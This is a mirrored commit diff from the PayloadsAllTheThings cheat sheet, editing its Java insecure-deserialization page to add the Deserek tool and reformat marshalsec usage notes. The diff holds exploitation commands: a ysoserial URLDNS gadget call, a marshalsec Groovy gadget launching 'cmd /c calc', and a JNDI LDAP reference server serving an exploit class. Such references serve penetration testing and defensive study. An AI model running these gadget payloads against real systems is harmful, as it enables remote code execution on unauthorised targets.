gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-01-03 00:09:46 -08:00
Code Issues Packages Projects Releases Wiki Activity

IIS MachineKeys + CI/CD + CSPT + ORM leak

Browse Source
This commit is contained in:
Swissky
2024-08-26 11:27:47 +02:00
parent 314e4da963
commit 1dae291696
19 changed files with 815 additions and 249 deletions
Download Patch File Download Diff File Expand all files Collapse all files

29
Insecure Deserialization/Java.md
View File

@@ -78,19 +78,24 @@ Wicket1 @jacob-baines wicket-util:6.23.0, s
- [NickstaDB/SerialBrute](https://github.com/NickstaDB/SerialBrute) - Java serialization brute force attack tool
- [NickstaDB/SerializationDumper](https://github.com/NickstaDB/SerializationDumper) - A tool to dump Java serialization streams in a more human readable form
- [bishopfox/gadgetprobe](https://labs.bishopfox.com/gadgetprobe)
- [k3idii/Deserek](https://github.com/k3idii/Deserek)
```java
java -jar ysoserial.jar URLDNS http://xx.yy > yss_base.bin
python deserek.py yss_base.bin --format python > yss_url.py
python yss_url.py yss_new.bin
java -cp JavaSerializationTestSuite DeSerial yss_new.bin
```
- [mbechler/marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution
```java
$ java -cp marshalsec.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
$ java -cp marshalsec.jar marshalsec.JsonIO Groovy "cmd" "/c" "calc"
$ java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389
-a - generates/tests all payloads for that marshaller
-t - runs in test mode, unmarshalling the generated payloads after generating them.
-v - verbose mode, e.g. also shows the generated payload in test mode.
gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller.
arguments - Gadget specific arguments
```
```java
$ java -cp marshalsec.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
$ java -cp marshalsec.jar marshalsec.JsonIO Groovy "cmd" "/c" "calc"
$ java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389
// -a - generates/tests all payloads for that marshaller
// -t - runs in test mode, unmarshalling the generated payloads after generating them.
// -v - verbose mode, e.g. also shows the generated payload in test mode.
// gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller.
// arguments - Gadget specific arguments
```
Payload generators for the following marshallers are included:<br />